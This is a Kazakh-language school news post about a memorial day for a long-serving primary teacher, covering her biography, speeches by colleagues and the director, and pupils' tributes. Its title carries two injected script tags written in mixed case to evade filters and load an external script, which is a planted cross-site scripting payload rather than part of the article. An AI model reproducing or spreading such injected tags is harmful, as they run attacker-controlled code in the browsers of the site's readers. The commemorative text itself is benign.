Ұлы ұстаз Усембаева Майра Жетпісбаеваны еске алу күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
09.01.2024
27 желтоқсан күні мектебімде Ұлы ұстаз Усембаева Майра Жетпісбаеваны еске алу күні өтті. Аяулы ұстазымыз 1952 жылдың 27-желтоқсанында дүниеге келген. Майра Жетпісбайқызы арнайы орта, Целиноград педагогикалық училищесінің бастауыш сынып мұғалімдері бөлімін 1970 жылы тәмамдап, 1977 жылдан бері Ғ.Әбдірахманұлы атындағы Қима орта мектебінде бастауыш сыныпта сабақ берген. Ұлы ұстаз шәкірт алдында адал, өзіне де, өзгеге де әділ бола білген жан. Аяулы ұстаз Майра Жетпісбайқызы шәкірт тәрбиелеуде сіңірген өнегелі еңбегі мектеп өмірінде және біздің жүрегімізде алар орны ерекше екені сөзсіз. Салтанатты линейкаға ардагер-ұстаздар: Омаров Ж.Қ., Суменова Н.К. келіп, естеліктерімен бөлісті. Мектеп директоры Л.А. Биримжанова есімі аңызға айналған ұстаздың еңбегі туралы сөз қозғап, оқушылар өлең жолдарын арнады. Іс-шара музыка пәнінің мұғалімі Б. Асхар орындауында «Ұстаздар» әнімен аяқталды. Аяулы да ардақты ұстазымыздың жатқан жері жарық, топырағы торқа болсын.